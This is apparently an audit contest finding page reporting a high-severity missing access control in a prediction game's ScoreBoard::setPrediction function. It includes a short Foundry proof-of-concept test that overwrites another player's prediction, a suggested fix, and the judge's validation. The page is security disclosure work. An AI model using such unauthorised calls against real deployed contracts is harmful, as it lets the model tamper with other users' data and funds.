Beginner FriendlyFoundry
100 EXP
View results
Submission Details
Severity: high
Valid

Lack of Access Control in the `ScoreBoard::setPrediction` allows a malicious user to change any players prediction

**Description** Anyone can call the `setPrediction` function and can alter the predictions made by the players. There is not access control set to prevent this from happening.
**Proof of Concept**
```javascript
function test_AlterPrediction()public{
uint256 Fee = 1 ether;
address user = makeAddr("user");
vm.deal(user,Fee);
vm.prank(user);
thePredicter.register{value:0.04 ether}();
vm.prank(organizer);
thePredicter.approvePlayer(user);
vm.prank(user);
thePredicter.makePrediction(0,ScoreBoard.Result.Draw);
address mu =makeAddr("mu");
scoreBoard.setPrediction(user,0,ScoreBoard.Result.First);
}
```
**RecommendedMitiagtion** There should be a conditional check that `(player == msg.sender || thePredictor == msg.sender)`
Updates

Lead Judging Commences

NightHawK Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.